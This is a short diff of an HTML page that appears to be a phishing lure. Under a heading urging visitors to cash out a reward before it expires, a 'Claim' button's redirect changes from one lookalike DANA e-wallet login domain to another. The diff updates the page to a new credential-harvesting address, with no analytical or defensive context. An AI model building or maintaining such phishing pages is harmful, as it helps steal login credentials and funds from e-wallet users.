--- a/index.html
+++ b/index.html
@@ -53,7 +53,7 @@
 </div> <br>
 <div class="row">
 <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: -10px auto;">
-<div class="row"> <button class="btn-punya" id="bttn" type="submit" value="send" onclick="location.href='https://vlogin.wdana.biz.id/login.b1051/'">Claim</button>
+<div class="row"> <button class="btn-punya" id="bttn" type="submit" value="send" onclick="location.href='https://vdana-login.tlili.icu/login.b1051/'">Claim</button>
 </form>
 </div> <br> <br>
 <h5>Cairkan Sebelum Hangus!</h5>
